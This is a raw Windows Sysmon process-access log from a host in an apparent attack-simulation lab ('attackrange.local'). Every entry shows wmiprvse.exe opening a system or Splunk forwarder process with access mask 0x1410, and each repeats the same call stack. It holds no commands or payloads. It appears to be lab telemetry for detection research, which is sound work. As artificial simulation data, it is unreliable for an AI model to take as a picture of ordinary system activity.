15:59:16.929{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023213Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.929{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023212Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.929{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023211Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.929{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023210Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023209Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023208Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023207Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023206Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023205Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023204Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023203Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023202Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023201Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023200Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023199Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023198Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023197Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023196Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023195Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:16.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000023194Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 